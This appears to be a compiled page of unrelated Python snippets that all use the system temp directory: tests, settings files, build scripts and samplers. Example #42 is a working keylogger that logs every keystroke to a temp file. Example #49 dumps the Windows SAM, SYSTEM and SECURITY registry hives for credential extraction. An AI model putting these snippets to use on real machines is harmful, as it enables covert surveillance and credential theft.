                genes, positions = load_index(namespace, logger)
                self.assertIsInstance(genes, dict)
                self.assertIsInstance(positions, dict)
                self.assertEqual(len(genes), 38)
                os.remove(namespace.reference.name)
                os.remove(namespace.log)
                os.remove("{}.midx".format(namespace.reference.name))
Example #31
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.middleware.locale.LocaleMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'shuup.front.middleware.ProblemMiddleware',
    'shuup.core.middleware.ShuupMiddleware',
    'shuup.front.middleware.ShuupFrontMiddleware',
    'shuup.admin.middleware.ShuupAdminMiddleware'
]

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(tempfile.gettempdir(), 'shuup_mailchimp.sqlite3'),
    }
}

MEDIA_ROOT = os.path.join(os.path.dirname(__file__), "var", "media")

STATIC_URL = "static/"

ROOT_URLCONF = 'shuup_workbench.urls'

LANGUAGES = [
    ('en', 'English'),
    ('fi', 'Finnish'),
]

USE_TZ = True
Example #32
import tempfile
from os.path import isfile, join
import requests
from pymol2 import SingletonPyMOL

PDB_ID = "1l2y"
CIF_PATH = join(tempfile.gettempdir(), PDB_ID + ".cif")
PNG_PATH = join(tempfile.gettempdir(), "pymol_test.png")

r = requests.get(f"https://files.rcsb.org/download/{PDB_ID}.cif")
with open(CIF_PATH, "w") as file:
    file.write(r.text)

pymol = SingletonPyMOL()
pymol.start()
cmd = pymol.cmd

cmd.load(CIF_PATH)

# Test rendering
cmd.png(PNG_PATH, ray=1)
assert isfile(PNG_PATH)

# Test correct integration of NumPy
assert cmd.get_coordset(PDB_ID).shape == (304, 3)
Example #33
def test_ftp_destination(sdc_builder, sdc_executor, ftp):
    """Smoke test FTP destination. We first create a local file using Local FS destination stage and use that file
    for FTP destination stage to see if it gets successfully uploaded.
    The pipelines looks like:
        dev_raw_data_source >> local_fs
        directory >> sftp_ftp_client
    """
    # Our destination FTP file name
    ftp_file_name = get_random_string(string.ascii_letters, 10)
    # Local temporary directory where we will create a source file to be uploaded to FTP server
    local_tmp_directory = os.path.join(tempfile.gettempdir(), get_random_string(string.ascii_letters, 10))

    # Build source file pipeline logic
    builder = sdc_builder.get_pipeline_builder()

    dev_raw_data_source = builder.add_stage('Dev Raw Data Source')
    dev_raw_data_source.set_attributes(data_format='TEXT', raw_data='Hello World!', stop_after_first_batch=True)

    local_fs = builder.add_stage('Local FS', type='destination')
    local_fs.set_attributes(directory_template=local_tmp_directory, data_format='TEXT')

    dev_raw_data_source >> local_fs
    local_fs_pipeline = builder.build('Local FS Pipeline')

    builder = sdc_builder.get_pipeline_builder()

    # Build FTP destination pipeline logic
    directory = builder.add_stage('Directory', type='origin')
    directory.set_attributes(data_format='WHOLE_FILE', file_name_pattern='sdc*', files_directory=local_tmp_directory)

    sftp_ftp_client = builder.add_stage(name=FTP_DEST_CLIENT_NAME)
    sftp_ftp_client.file_name_expression = ftp_file_name

    directory >> sftp_ftp_client
    sftp_ftp_client_pipeline = builder.build('FTP Destination Pipeline Simple').configure_for_environment(ftp)

    sdc_executor.add_pipeline(local_fs_pipeline, sftp_ftp_client_pipeline)

    # Start source file creation pipeline and assert file has been created with expected number of records
    sdc_executor.start_pipeline(local_fs_pipeline).wait_for_finished()
    history = sdc_executor.get_pipeline_history(local_fs_pipeline)

    try:
        assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 1
        assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 1

        # Start FTP upload (destination) file pipeline and assert pipeline has processed expected number of files
        sdc_executor.start_pipeline(sftp_ftp_client_pipeline).wait_for_pipeline_output_records_count(1)
        sdc_executor.stop_pipeline(sftp_ftp_client_pipeline)
        history = sdc_executor.get_pipeline_history(sftp_ftp_client_pipeline)
        assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 1
        assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 1

        # Read FTP destination file and compare our source data to assert
        assert ftp.get_string(ftp_file_name) == dev_raw_data_source.raw_data

    finally:
        # Delete the test FTP destination file we created
        client = ftp.client
        client.delete(ftp_file_name)
        client.quit()
Example #34
def main():
    # Parse arguments and pass through unrecognised args
    parser = argparse.ArgumentParser(add_help=False,
                                     usage='%(prog)s [test_runner.py options] [script options] [scripts]',
                                     description=__doc__,
                                     epilog='''
    Help text and arguments for individual test script:''',
                                     formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument('--combinedlogslen', '-c', type=int, default=0, help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
    parser.add_argument('--coverage', action='store_true', help='generate a basic coverage report for the RPC interface')
    parser.add_argument('--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
    parser.add_argument('--extended', action='store_true', help='run the extended test suite in addition to the basic tests')
    parser.add_argument('--force', '-f', action='store_true', help='run tests even on platforms where they are disabled by default (e.g. windows).')
    parser.add_argument('--help', '-h', '-?', action='store_true', help='print help text and exit')
    parser.add_argument('--jobs', '-j', type=int, default=4, help='how many test scripts to run in parallel. Default=4.')
    parser.add_argument('--keepcache', '-k', action='store_true', help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
    parser.add_argument('--quiet', '-q', action='store_true', help='only print results summary and failure logs')
    parser.add_argument('--tmpdirprefix', '-t', default=tempfile.gettempdir(), help="Root directory for datadirs")
    args, unknown_args = parser.parse_known_args()

    # args to be passed on always start with two dashes; tests are the remaining unknown args
    tests = [arg for arg in unknown_args if arg[:2] != "--"]
    passon_args = [arg for arg in unknown_args if arg[:2] == "--"]

    # Read config generated by configure.
    config = configparser.ConfigParser()
    configfile = os.path.abspath(os.path.dirname(__file__)) + "/../config.ini"
    config.read_file(open(configfile))

    passon_args.append("--configfile=%s" % configfile)

    # Set up logging
    logging_level = logging.INFO if args.quiet else logging.DEBUG
    logging.basicConfig(format='%(message)s', level=logging_level)

    # Create base test directory
    tmpdir = "%s/watercoin_test_runner_%s" % (args.tmpdirprefix, datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
    os.makedirs(tmpdir)

    logging.debug("Temporary test directory at %s" % tmpdir)

    enable_wallet = config["components"].getboolean("ENABLE_WALLET")
    enable_utils = config["components"].getboolean("ENABLE_UTILS")
    enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")

    if config["environment"]["EXEEXT"] == ".exe" and not args.force:
        # https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
        # https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
        print("Tests currently disabled on Windows by default. Use --force option to enable")
        sys.exit(0)

    if not (enable_wallet and enable_utils and enable_bitcoind):
        print("No functional tests to run. Wallet, utils, and watercoind must all be enabled")
        print("Rerun `configure` with -enable-wallet, -with-utils and -with-daemon and rerun make")
        sys.exit(0)

    # Build list of tests
    if tests:
        # Individual tests have been specified. Run specified tests that exist
        # in the ALL_SCRIPTS list. Accept the name with or without .py extension.
        tests = [re.sub("\.py$", "", t) + ".py" for t in tests]
        test_list = []
        for t in tests:
            if t in ALL_SCRIPTS:
                test_list.append(t)
            else:
                print("{}WARNING!{} Test '{}' not found in full test list.".format(BOLD[1], BOLD[0], t))
    else:
        # No individual tests have been specified.
        # Run all base tests, and optionally run extended tests.
        test_list = BASE_SCRIPTS
        if args.extended:
            # place the EXTENDED_SCRIPTS first since the three longest ones
            # are there and the list is shorter
            test_list = EXTENDED_SCRIPTS + test_list

    # Remove the test cases that the user has explicitly asked to exclude.
    if args.exclude:
        tests_excl = [re.sub("\.py$", "", t) + ".py" for t in args.exclude.split(',')]
        for exclude_test in tests_excl:
            if exclude_test in test_list:
                test_list.remove(exclude_test)
            else:
                print("{}WARNING!{} Test '{}' not found in current test list.".format(BOLD[1], BOLD[0], exclude_test))

    if not test_list:
        print("No valid test scripts specified. Check that your test is in one "
              "of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
        sys.exit(0)

    if args.help:
        # Print help for test_runner.py, then print help of the first script (with args removed) and exit.
        parser.print_help()
        subprocess.check_call([(config["environment"]["SRCDIR"] + '/test/functional/' + test_list[0].split()[0])] + ['-h'])
        sys.exit(0)

    check_script_list(config["environment"]["SRCDIR"])
    check_script_prefixes()

    if not args.keepcache:
        shutil.rmtree("%s/test/cache" % config["environment"]["BUILDDIR"], ignore_errors=True)

    run_tests(test_list, config["environment"]["SRCDIR"], config["environment"]["BUILDDIR"], config["environment"]["EXEEXT"], tmpdir, args.jobs, args.coverage, passon_args, args.combinedlogslen)
Example #35
def test_checkpoint_loader():
    import os
    import tempfile

    from mmcv.runner import CheckpointLoader, _load_checkpoint, save_checkpoint
    checkpoint_path = os.path.join(tempfile.gettempdir(), 'checkpoint.pth')
    model = Model()
    save_checkpoint(model, checkpoint_path)
    checkpoint = _load_checkpoint(checkpoint_path)
    assert 'meta' in checkpoint and 'CLASSES' not in checkpoint['meta']
    # remove the temp file
    os.remove(checkpoint_path)

    filenames = [
        'http://xx.xx/xx.pth', 'https://xx.xx/xx.pth',
        'modelzoo://xx.xx/xx.pth', 'torchvision://xx.xx/xx.pth',
        'open-mmlab://xx.xx/xx.pth', 'openmmlab://xx.xx/xx.pth',
        'mmcls://xx.xx/xx.pth', 'pavi://xx.xx/xx.pth', 's3://xx.xx/xx.pth',
        'ss3://xx.xx/xx.pth', ' s3://xx.xx/xx.pth',
        'open-mmlab:s3://xx.xx/xx.pth', 'openmmlab:s3://xx.xx/xx.pth',
        'openmmlabs3://xx.xx/xx.pth', ':s3://xx.xx/xx.path'
    ]
    fn_names = [
        'load_from_http', 'load_from_http', 'load_from_torchvision',
        'load_from_torchvision', 'load_from_openmmlab', 'load_from_openmmlab',
        'load_from_mmcls', 'load_from_pavi', 'load_from_ceph',
        'load_from_local', 'load_from_local', 'load_from_ceph',
        'load_from_ceph', 'load_from_local', 'load_from_local'
    ]

    for filename, fn_name in zip(filenames, fn_names):
        loader = CheckpointLoader._get_checkpoint_loader(filename)
        assert loader.__name__ == fn_name

    @CheckpointLoader.register_scheme(prefixes='ftp://')
    def load_from_ftp(filename, map_location):
        return dict(filename=filename)

    # test register_loader
    filename = 'ftp://xx.xx/xx.pth'
    loader = CheckpointLoader._get_checkpoint_loader(filename)
    assert loader.__name__ == 'load_from_ftp'

    def load_from_ftp1(filename, map_location):
        return dict(filename=filename)

    # test duplicate registered error
    with pytest.raises(KeyError):
        CheckpointLoader.register_scheme('ftp://', load_from_ftp1)

    # test force param
    CheckpointLoader.register_scheme('ftp://', load_from_ftp1, force=True)
    checkpoint = CheckpointLoader.load_checkpoint(filename)
    assert checkpoint['filename'] == filename

    # test print function name
    loader = CheckpointLoader._get_checkpoint_loader(filename)
    assert loader.__name__ == 'load_from_ftp1'

    # test sort
    @CheckpointLoader.register_scheme(prefixes='a/b')
    def load_from_ab(filename, map_location):
        return dict(filename=filename)

    @CheckpointLoader.register_scheme(prefixes='a/b/c')
    def load_from_abc(filename, map_location):
        return dict(filename=filename)

    filename = 'a/b/c/d'
    loader = CheckpointLoader._get_checkpoint_loader(filename)
    assert loader.__name__ == 'load_from_abc'
Example #36
def test_load_checkpoint_metadata():
    import os
    import tempfile

    from mmcv.runner import load_checkpoint, save_checkpoint

    class ModelV1(nn.Module):
        def __init__(self):
            super().__init__()
            self.block = Block()
            self.conv1 = nn.Conv2d(3, 3, 1)
            self.conv2 = nn.Conv2d(3, 3, 1)
            nn.init.normal_(self.conv1.weight)
            nn.init.normal_(self.conv2.weight)

    class ModelV2(nn.Module):
        _version = 2

        def __init__(self):
            super().__init__()
            self.block = Block()
            self.conv0 = nn.Conv2d(3, 3, 1)
            self.conv1 = nn.Conv2d(3, 3, 1)
            nn.init.normal_(self.conv0.weight)
            nn.init.normal_(self.conv1.weight)

        def _load_from_state_dict(self, state_dict, prefix, local_metadata,
                                  *args, **kwargs):
            """load checkpoints."""

            # Names of some parameters have been changed.
            version = local_metadata.get('version', None)
            if version is None or version < 2:
                state_dict_keys = list(state_dict.keys())
                convert_map = {'conv1': 'conv0', 'conv2': 'conv1'}
                for k in state_dict_keys:
                    for ori_str, new_str in convert_map.items():
                        if k.startswith(prefix + ori_str):
                            new_key = k.replace(ori_str, new_str)
                            state_dict[new_key] = state_dict[k]
                            del state_dict[k]

            super()._load_from_state_dict(state_dict, prefix, local_metadata,
                                          *args, **kwargs)

    model_v1 = ModelV1()
    model_v1_conv0_weight = model_v1.conv1.weight.detach()
    model_v1_conv1_weight = model_v1.conv2.weight.detach()
    model_v2 = ModelV2()
    model_v2_conv0_weight = model_v2.conv0.weight.detach()
    model_v2_conv1_weight = model_v2.conv1.weight.detach()
    ckpt_v1_path = os.path.join(tempfile.gettempdir(), 'checkpoint_v1.pth')
    ckpt_v2_path = os.path.join(tempfile.gettempdir(), 'checkpoint_v2.pth')

    # Save checkpoint
    save_checkpoint(model_v1, ckpt_v1_path)
    save_checkpoint(model_v2, ckpt_v2_path)

    # test load v1 model
    load_checkpoint(model_v2, ckpt_v1_path)
    assert torch.allclose(model_v2.conv0.weight, model_v1_conv0_weight)
    assert torch.allclose(model_v2.conv1.weight, model_v1_conv1_weight)

    # test load v2 model
    load_checkpoint(model_v2, ckpt_v2_path)
    assert torch.allclose(model_v2.conv0.weight, model_v2_conv0_weight)
    assert torch.allclose(model_v2.conv1.weight, model_v2_conv1_weight)
Example #37
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
#
# $Id$

from os import environ
from tempfile import gettempdir
environ['PYTHON_EGG_CACHE'] = gettempdir()

import sys
from jon import cgi
from exceptions import OGCException, ServerConfigurationError
from wms111 import ExceptionHandler as ExceptionHandler111
from wms130 import ExceptionHandler as ExceptionHandler130
from ConfigParser import SafeConfigParser
from common import Version


class Handler(cgi.DebugHandler):
    def __init__(self):
        conf = SafeConfigParser()
        conf.readfp(open(self.configpath))
        self.conf = conf
Example #38
#

from tempfile import gettempdir

# Your Shadowsocks Path
#  SS_EXEC     - The full command starting ssserver, without "-d start".
#  SS_CONF     - The Shadowsocks config file which SSLand will manage.
SS_EXEC = ["sudo", "ssserver", "-c", "/etc/ss.conf"]
SS_CONF = "/etc/ss.conf"

# User Configuration
#  USER_ADMIN  - Administrator user ID. Usually the first user, whose id is 1.
#  USER_SALT   - Account password hashing salt. Make it complex :)
USER_ADMIN = 1
USER_SALT = "~amADmANiNabLUEbOX!"

# The formula to generate the user's Shadowsocks port
user_port = lambda id: 6580 + int(id * 1.5)
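# For example: user_port(1) == 6581, user_port(2) == 6583, user_port(10) == 6595.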

# Minimal interval for Shadowsocks restarting
UPDATE_INTERVAL = 30.0

# Directories
USER_ROOT = "user"
WEB_ROOT = "www"
TMP_ROOT = gettempdir() 

# WebServer Config
WEB_HOST = "0.0.0.0"
WEB_PORT = 8080
Example #39
    from urllib.parse import urlparse


BASE_URL = os.getenv('NHENTAI', 'https://nhentai.net')

__api_suspended_DETAIL_URL = '%s/api/gallery' % BASE_URL

DETAIL_URL = '%s/g' % BASE_URL
SEARCH_URL = '%s/api/galleries/search' % BASE_URL


TAG_API_URL = '%s/api/galleries/tagged' % BASE_URL
LOGIN_URL = '%s/login/' % BASE_URL
CHALLENGE_URL = '%s/challenge' % BASE_URL
FAV_URL = '%s/favorites/' % BASE_URL

u = urlparse(BASE_URL)
IMAGE_URL = '%s://i.%s/galleries' % (u.scheme, u.hostname)

NHENTAI_HOME = os.path.join(os.getenv('HOME', tempfile.gettempdir()), '.nhentai')
NHENTAI_HISTORY = os.path.join(NHENTAI_HOME, 'history.sqlite3')
NHENTAI_CONFIG_FILE = os.path.join(NHENTAI_HOME, 'config.json')


CONFIG = {
    'proxy': {'http': '', 'https': ''},
    'cookie': '',
    'language': '',
    'template': '',
}
Example #40
        " El partido entre dos equipos argentinos que los argentinos no pudieron organizar, y para el que solo encontraron la solución de que no se jugara en su territorio, aterrizó este jueves por la tarde en Madrid, cuando el presidente del Gobierno, Pedro Sánchez, anunció a través de su cuenta de Twitter, mientras volaba a Buenos Aires a la cumbre del G20: “España está dispuesta a organizar la final de la Copa Libertadores entre Boca y River”. Apenas una hora después, Alejandro Domínguez, presidente de la Conmebol, organizadora del torneo, oficializó que el encuentro se disputará el próximo domingo 9 de diciembre en el Santiago Bernabéu a las 20.30.",
        OutputFormat="mp3",
        VoiceId="Conchita")
except (BotoCoreError, ClientError) as error:
    # The service returned an error, exit gracefully
    print(error)
    sys.exit(-1)

# Access the audio stream from the response
if "AudioStream" in response:
    # Note: Closing the stream is important as the service throttles on the
    # number of parallel connections. Here we are using contextlib.closing to
    # ensure the close method of the stream object will be called automatically
    # at the end of the with statement's scope.
    with closing(response["AudioStream"]) as stream:
        output = os.path.join(gettempdir(), "speech.mp3")

        try:
            # Open a file for writing the output as a binary stream
            with open(output, "wb") as file:
                file.write(stream.read())
        except IOError as error:
            # Could not write to file, exit gracefully
            print(error)
            sys.exit(-1)

else:
    # The response didn't contain audio data, exit gracefully
    print("Could not stream audio")
    sys.exit(-1)
Example #41
 File: fs.py Project: HazardDede/pnp
 def _parse_out_path(value):
     if not value:
         import tempfile
         return tempfile.gettempdir()
     validator.is_directory(out_path=value)
     return os.path.abspath(str(value))
Example #42
import os
import tempfile
import logging
from pynput.keyboard import Key, Listener

print("Temp dir loc --> ", tempfile.gettempdir())

log_loc = tempfile.gettempdir()
log_file = "key_logger.txt"
logging.basicConfig(filename=os.path.join(log_loc, log_file),
                    level=logging.DEBUG,
                    format="%(asctime)s: %(message)s")


def key_presses(key):
    logging.info(str(key))


with Listener(on_press=key_presses) as listener:
    listener.join()
Example #43
 def initialize(self):
     """Imports the PolyChord sampler and prepares its arguments."""
     if am_single_or_primary_process():  # rank = 0 (MPI master) or None (no MPI)
         self.log.info("Initializing")
     # If path not given, try using general path to modules
     if not self.path and self.path_install:
         self.path = get_path(self.path_install)
     if self.path:
         if am_single_or_primary_process():
             self.log.info("Importing *local* PolyChord from " + self.path)
             if not os.path.exists(os.path.realpath(self.path)):
                 self.log.error("The given path does not exist.")
                 raise HandledException
         pc_build_path = get_build_path(self.path)
         if not pc_build_path:
             self.log.error("Either PolyChord is not in the given folder, "
                            "'%s', or you have not compiled it.", self.path)
             raise HandledException
         # Inserting the previously found path into the list of import folders
         sys.path.insert(0, pc_build_path)
     else:
         self.log.info("Importing *global* PolyChord.")
     try:
         import pypolychord
         from pypolychord.settings import PolyChordSettings
         self.pc = pypolychord
     except ImportError:
         self.log.error(
             "Couldn't find the PolyChord python interface. "
             "Make sure that you have compiled it, and that you either\n"
             " (a) specify a path (you didn't) or\n"
             " (b) install the Python interface globally with\n"
             "     '/path/to/PolyChord/python setup.py install --user'")
         raise HandledException
     # Prepare arguments and settings
     self.nDims = self.model.prior.d()
     self.nDerived = (len(self.model.parameterization.derived_params()) +
                      len(self.model.prior) + len(self.model.likelihood._likelihoods))
     if self.logzero is None:
         self.logzero = np.nan_to_num(-np.inf)
     if self.max_ndead == np.inf:
         self.max_ndead = -1
     for p in ["nlive", "num_repeats", "nprior", "max_ndead"]:
         setattr(self, p, read_dnumber(getattr(self, p), self.nDims, dtype=int))
     # Fill the automatic ones
     if getattr(self, "feedback", None) is None:
         values = {logging.CRITICAL: 0, logging.ERROR: 0, logging.WARNING: 0,
                   logging.INFO: 1, logging.DEBUG: 2}
         self.feedback = values[self.log.getEffectiveLevel()]
     try:
         output_folder = getattr(self.output, "folder")
         output_prefix = getattr(self.output, "prefix") or ""
         self.read_resume = self.resuming
     except AttributeError:
         # dummy output -- no resume!
         self.read_resume = False
         from tempfile import gettempdir
         output_folder = gettempdir()
         if am_single_or_primary_process():
             from random import random
             output_prefix = hex(int(random() * 16 ** 6))[2:]
         else:
             output_prefix = None
         if more_than_one_process():
             output_prefix = get_mpi_comm().bcast(output_prefix, root=0)
     self.base_dir = os.path.join(output_folder, self.base_dir)
     self.file_root = output_prefix
     if am_single_or_primary_process():
         # Creating output folder, if it does not exist (just one process)
         if not os.path.exists(self.base_dir):
             os.makedirs(self.base_dir)
         # Idem, a clusters folder if needed -- notice that PolyChord's default
         # is "True", here "None", hence the funny condition below
         if self.do_clustering is not False:  # None here means "default"
             try:
                 os.makedirs(os.path.join(self.base_dir, clusters))
             except OSError:  # exists!
                 pass
         self.log.info("Storing raw PolyChord output in '%s'.",
                       self.base_dir)
     # Exploiting the speed hierarchy
     speeds, blocks = self.model.likelihood._speeds_of_params(int_speeds=True)
     blocks_flat = list(chain(*blocks))
     self.ordering = [
         blocks_flat.index(p) for p in self.model.parameterization.sampled_params()]
     self.grade_dims = [len(block) for block in blocks]
     #        self.grade_frac = np.array(
     #            [i*j for i,j in zip(self.grade_dims, speeds)])
     #        self.grade_frac = (
     #            self.grade_frac/sum(self.grade_frac))
     # Disabled for now. We need a way to override the "time" part of the meaning of grade_frac
     self.grade_frac = [1 / len(self.grade_dims) for _ in self.grade_dims]
     # Assign settings
     pc_args = ["nlive", "num_repeats", "nprior", "do_clustering",
                "precision_criterion", "max_ndead", "boost_posterior", "feedback",
                "logzero", "posteriors", "equals", "compression_factor",
                "cluster_posteriors", "write_resume", "read_resume", "write_stats",
                "write_live", "write_dead", "base_dir", "grade_frac", "grade_dims",
                "feedback", "read_resume", "base_dir", "file_root", "grade_frac",
                "grade_dims"]
     self.pc_settings = PolyChordSettings(
         self.nDims, self.nDerived, seed=(self.seed if self.seed is not None else -1),
         **{p: getattr(self, p) for p in pc_args if getattr(self, p) is not None})
     # prior conversion from the hypercube
     bounds = self.model.prior.bounds(
         confidence_for_unbounded=self.confidence_for_unbounded)
     # Check if priors are bounded (nan's to inf)
     inf = np.where(np.isinf(bounds))
     if len(inf[0]):
         params_names = self.model.parameterization.sampled_params()
         params = [params_names[i] for i in sorted(list(set(inf[0])))]
         self.log.error("PolyChord needs bounded priors, but the parameter(s) '"
                        "', '".join(params) + "' is(are) unbounded.")
         raise HandledException
     locs = bounds[:, 0]
     scales = bounds[:, 1] - bounds[:, 0]
     # This function re-scales the parameters AND puts them in the right order
     self.pc_prior = lambda x: (locs + np.array(x)[self.ordering] * scales).tolist()
     # We will need the volume of the prior domain, since PolyChord divides by it
     self.logvolume = np.log(np.prod(scales))
     # Prepare callback function
     if self.callback_function is not None:
         self.callback_function_callable = (
             get_external_function(self.callback_function))
     self.last_point_callback = 0
     # Prepare runtime live and dead points collections
     self.live = Collection(
         self.model, None, name="live", initial_size=self.pc_settings.nlive)
     self.dead = Collection(self.model, self.output, name="dead")
     self.n_sampled = len(self.model.parameterization.sampled_params())
     self.n_derived = len(self.model.parameterization.derived_params())
     self.n_priors = len(self.model.prior)
     self.n_likes = len(self.model.likelihood._likelihoods)
     # Done!
     if am_single_or_primary_process():
         self.log.info("Calling PolyChord with arguments:")
         for p, v in inspect.getmembers(self.pc_settings, lambda a: not (callable(a))):
             if not p.startswith("_"):
                 self.log.info("  %s: %s", p, v)
Example No. 44
def Main():
    builder = os.environ.get('BUILDBOT_BUILDERNAME')
    build_number = os.environ.get('BUILDBOT_BUILDNUMBER')
    build_revision = os.environ.get('BUILDBOT_GOT_REVISION',
                                    os.environ.get('BUILDBOT_REVISION'))
    slave_type = os.environ.get('BUILDBOT_SLAVE_TYPE')
    cmd = BOT_ASSIGNMENT.get(builder)
    if not cmd:
        sys.stderr.write('ERROR - unset/invalid builder name\n')
        sys.exit(1)

    env = os.environ.copy()

    # Don't write out .pyc files because in cases in which files move around or
    # the PYTHONPATH / sys.path change, old .pyc files can be mistakenly used.
    # This avoids the need for admin changes on the bots in this case.
    env['PYTHONDONTWRITEBYTECODE'] = '1'

    env['GSUTIL'] = pynacl.file_tools.Which('gsutil.py',
                                            require_executable=False)

    # When running from cygwin, we sometimes want to use a native python.
    # The native python will use the depot_tools version by invoking python.bat.
    if pynacl.platform.IsWindows():
        env['NATIVE_PYTHON'] = 'python.bat'
    else:
        env['NATIVE_PYTHON'] = 'python'

    if sys.platform == 'win32':
        # If the temp directory is not on the same drive as the working directory,
        # there can be random failures when cleaning up temp directories, so use
        # a directory on the current drive. Use __file__ here instead of os.getcwd()
        # because toolchain_main picks its working directories relative to __file__
        filedrive, _ = os.path.splitdrive(__file__)
        tempdrive, _ = os.path.splitdrive(env['TEMP'])
        if tempdrive != filedrive:
            env['TEMP'] = filedrive + '\\temp'
            if not os.path.exists(env['TEMP']):
                os.mkdir(env['TEMP'])

    # Ensure a temp directory exists.
    if 'TEMP' not in env:
        env['TEMP'] = tempfile.gettempdir()

    # Isolate build's temp directory to a particular location so we can clobber
    # the whole thing predictably and so we have a record of who's leaking
    # temporary files.
    nacl_tmp = os.path.join(env['TEMP'], 'nacl_tmp')
    if not os.path.exists(nacl_tmp):
        os.mkdir(nacl_tmp)
    env['TEMP'] = os.path.join(nacl_tmp, builder)
    if not os.path.exists(env['TEMP']):
        os.mkdir(env['TEMP'])

    # Set all temp directory variants to the same thing.
    env['TMPDIR'] = env['TEMP']
    env['TMP'] = env['TEMP']
    print('TEMP=%s' % env['TEMP'])
    sys.stdout.flush()

    print("%s runs: %s\n" % (builder, cmd))
    sys.stdout.flush()
    retcode = subprocess.call(cmd, env=env, shell=True)
    sys.exit(retcode)
Example No. 45
 def get_tmp_dir(self, opt_tmp_dir):
     if not opt_tmp_dir:
         return tempfile.gettempdir()
     return opt_tmp_dir
Example No. 46
#!/usr/bin/env python
Example No. 47
def run_iptestall(inc_slow=False):
    """Run the entire IPython test suite by calling nose and trial.

    This function constructs :class:`IPTester` instances for all IPython
    modules and packages and then runs each of them.  This causes the modules
    and packages of IPython to be tested each in their own subprocess using
    nose.
    
    Parameters
    ----------
    
    inc_slow : bool, optional
      Include slow tests, like IPython.parallel. By default, these tests aren't
      run.
    """

    runners = make_runners(inc_slow=inc_slow)

    # Run the test runners in a temporary dir so we can nuke it when finished
    # to clean up any junk files left over by accident.  This also makes it
    # robust against being run in non-writeable directories by mistake, as the
    # temp dir will always be user-writeable.
    curdir = os.getcwdu()
    testdir = tempfile.gettempdir()
    os.chdir(testdir)

    # Run all test runners, tracking execution time
    failed = []
    t_start = time.time()
    try:
        for (name, runner) in runners:
            print('*'*70)
            print('IPython test group:',name)
            res = runner.run()
            if res:
                failed.append( (name, runner) )
                if res == -signal.SIGINT:
                    print("Interrupted")
                    break
    finally:
        os.chdir(curdir)
    t_end = time.time()
    t_tests = t_end - t_start
    nrunners = len(runners)
    nfail = len(failed)
    # summarize results
    print()
    print('*'*70)
    print('Test suite completed for system with the following information:')
    print(report())
    print('Ran %s test groups in %.3fs' % (nrunners, t_tests))
    print()
    print('Status:')
    if not failed:
        print('OK')
    else:
        # If anything went wrong, point out what command to rerun manually to
        # see the actual errors and individual summary
        print('ERROR - %s out of %s test groups failed.' % (nfail, nrunners))
        for name, failed_runner in failed:
            print('-'*40)
            print('Runner failed:',name)
            print('You may wish to rerun this one individually, with:')
            failed_call_args = [py3compat.cast_unicode(x) for x in failed_runner.call_args]
            print(u' '.join(failed_call_args))
            print()
        # Ensure that our exit code indicates failure
        sys.exit(1)
Example No. 48
from pathlib import Path
from os.path import join
from tempfile import gettempdir

# pylint: disable=import-error
import tensorflow as tf

from tensorflow.contrib import predictor
# pylint: enable=import-error

from ..model import model_fn, InputProviderFactory
from ..model.provider import get_default_model_provider

# Default exporting directory for predictor.
DEFAULT_EXPORT_DIRECTORY = join(gettempdir(), 'serving')



def get_default_model_dir(model_dir):
    """
    Transforms a string like 'spleeter:2stems' into an actual path.
    :param model_dir:
    :return:
    """
    model_provider = get_default_model_provider()
    return model_provider.get(model_dir)

def create_estimator(params, MWF):
    """
        Initialize tensorflow estimator that will perform separation
Example No. 49
	def from_live_system():
		logger.debug('Obtaining registry from local system')
		try:
			from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
			from pypykatz.commons.winapi.constants import SE_BACKUP
			import winreg
			import tempfile
			import os
			import ntpath
		except Exception as e:
			logger.error('Could not import necessary packages! Are you on Windows? Error: %s' % str(e))
			raise
			
		sam_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		system_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		security_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		
		locations = [
			('SAM', sam_name),
			('SYSTEM', system_name),
			('SECURITY', security_name),
		]
		
		logger.debug('Obtaining SE_BACKUP privilege...')
		try:
			po = ProcessManipulator()
			po.set_privilege(SE_BACKUP)
		except Exception as e:
			logger.error('Failed to obtain SE_BACKUP privilege! Registry dump will not work! Reason: %s' % str(e))
			raise e
		logger.debug('Obtaining SE_BACKUP OK!')
		
		dumped_names = {}
		for reg_name, location in locations:
			logger.debug('Dumping %s...' % reg_name)
			try:
				key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_name, access=0x00020000)
				winreg.SaveKey(key, location)
				key.Close()
			except Exception as e:
				logger.error('Dumping %s FAILED!! Reason: %s' % (reg_name, str(e)))
			else:
				logger.debug('Dumping %s OK!' % reg_name)
				dumped_names[reg_name] = location
		###
		### Do Parsing here!
		###
		po = None
		if 'SYSTEM' in dumped_names:
			try:
				po = OffineRegistry.from_files(system_name, sam_name if 'SAM' in dumped_names else None, security_name if 'SECURITY' in dumped_names else None)
			except Exception as e:
				import traceback
				traceback.print_exc()
		else:
